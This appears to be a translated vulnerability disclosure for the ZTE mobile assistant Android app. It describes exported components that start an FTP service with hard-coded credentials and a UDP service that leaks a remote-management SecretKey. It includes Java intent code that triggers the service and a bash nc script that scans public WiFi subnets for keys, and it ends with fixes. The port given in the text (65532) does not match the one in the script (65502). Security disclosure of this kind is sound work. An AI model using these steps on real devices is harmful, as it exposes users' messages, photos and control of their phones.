ZTE mobile assistant Local Elevation of Privilege and authentication mechanism for WIFI Remote Management bypass (detailed Android analysis process and ideas)

ZTE mobile assistant Local Elevation of Privilege and authentication mechanism for WIFI Remote Management bypass (detailed Android analysis process and ideas)

There are two vulnerabilities:

(1) components exposed, resulting in Local Elevation of Privilege and remote access

(2) Remote Management authentication mechanism Bypass

ZTE mobile assistant is the official Android smartphone management software of ZTE.

There are two vulnerabilities:

First vulnerability: Elevation of Privilege due to local component exposure, as long as the user installs the ZTE mobile assistant, local malicious applications without any permissions can start the FTP service for remote access without the user's knowledge, and the FTP service has the default user name and password.

The two Android components exposed are com. joinme. ftp. FtpServerService and JoinMeServiceReceiver. Use the following code,

m_testbutton1=(Button)findViewById(R.id.BySvc);        m_testbutton1.setOnClickListener(new OnClickListener()        {@Overridepublic void onClick(View v) {// TODO Auto-generated method stubIntent i = new Intent();i.setAction("com.joinme.ftp.FtpServerService");startService(i);}        });

Or
 

m_testbutton2=(Button)findViewById(R.id.ByReceiver);        m_testbutton2.setOnClickListener(new OnClickListener()        {@Overridepublic void onClick(View v) {// TODO Auto-generated method stubIntent i = new Intent();i.setAction("android.intent.action.JoinMe_Ftp_Server_Service_Start");sendBroadcast(i);}        });

One to start the FTP service built in the mobile assistant.



Under normal circumstances, user intervention is required to enable the Service,
 

Enable the service without your knowledge (you only need to install the ZTE mobile assistant on your mobile phone)
 

The FTP service also has a built-in default user name and password, and listens on port 2121. For example, see

Code snippet in FtpServerService.

Load FTP service settings
 

Follow the Defaults class to obtain the default username, password is JoinMe, port is 2121
 

Second vulnerability: When the mobile assistant is running in the background, SecretKey is leaked, resulting in remote control of the mobile phone in the WIFI Environment



When analyzing the first vulnerability, we found the second vulnerability. Compared with this vulnerability, the previous vulnerability was nothing more than that.

The vulnerability is located in JoinMeUdpService. This service enables udp port 65532 listening. After receiving a specific command word, it can return sensitive information of the mobile phone, including the SecretKey



, DoListen method of JoinMeUdpService
 

After entering doComm, you can find that the specific command is "JoinMe Broadcast"
 

 

Proof of the first vulnerability:

Use the default user name and password to remotely access the FTP service. Files in directories such as browse and download/sdcard are not root.
 

Commands supported by the FTP service
 

Proof of the second vulnerability:
 

Note that the above SecretKey is the verification code used by ZTE mobile assistant to manage mobile phones on PC. When the mobile assistant is running in the background, you can use the verification code on the PC side to fully manage the mobile phone and obtain all the communication records, text messages, photos, and application information, and has all the permissions to add and delete mobile assistants !!
 

 

The most lethal scenario is in public WIFI. When the user's mobile assistant runs, you can use the following script to scan for the SecretKey and use the PC for remote control!

Scan. sh
 

#!/bin/bashnetwork="192.168.1"for address in $(seq 1 254)do    echo  ${network}.${address}    echo -n "JoinMe Broadcast" | nc  -w 2 -u  ${network}.${address}  65502done

Scan results
 

Remote control mobile phone on PC side
 

 

Solution:

For vulnerability 1, set com. joinme. ftp. FtpServerService and JoinMeServiceReceiver to exported: false, or set custom permissions and set the protection level to signature. The FTP service user name and password. Do not hard-code them in the code. You can set them to be read in the configuration file. Or the user can temporarily specify the mobile assistant on the PC side.

Vulnerability 2: Disable remote echo SecretKey